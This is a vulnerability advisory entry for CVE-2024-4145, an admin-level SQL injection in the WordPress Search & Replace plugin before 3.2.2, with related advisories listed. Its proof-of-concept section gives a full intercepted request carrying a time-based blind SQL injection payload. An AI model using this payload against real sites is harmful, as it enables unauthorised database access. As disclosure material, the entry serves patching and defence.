Search & Replace < 3.2.2 – Admin+ SQL injection | CVE 2024-4145 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).

Proof of Concept

1. Go to the Tools parameter
2. Select Search & Replace
3. Click "Do Search & Replace"
4. Change the parameters and intercept the request
5. Put a vulnerable SQL query in the request, such as the following: `search=123&replace=1&csv=1&select_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)&export_or_save=1&action=search-replace&search-submit=123123"asdasd=''&insr_nonce=0590310227&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dsearch-replace`
6. Notice that the response takes double seconds of the SLEEP(x-) number you insert.

Affects Plugins

search-and-replace

Fixed in 3.2.2

References

CVE

URL

https://research.cleantalk.org/CVE-2024-4145/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krugov Artyom

Submitter

Krugov Aryom

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

7d5b8764-c82d-4969-a707-f38b63bcadca

Timeline

Publicly Published

2024-05-23 (about 1 year ago)

Added

2024-05-23 (about 1 year ago)

Last Updated

2024-05-23 (about 1 year ago)

Other

Published

Title

Published

2025-11-27

Title

KiviCare < 3.6.14 - Authenticated (Patient+) SQL Injection

Published

2024-01-03

Title

pTypeConverter <= 0.2.8.1 - Authenticated (Editor+) SQL Injection

Published

2025-01-03

Title

WordPress Auction Plugin <= 3.7 - Authenticated (Editor+) SQL Injection

Published

2019-05-10

Title

Form Maker by 10Web < 1.13.3 - Authenticated SQL Injection

Published

2023-10-15

Title

History Log by click5 < 1.0.13 - Admin+ Time-Based Blind SQL Injection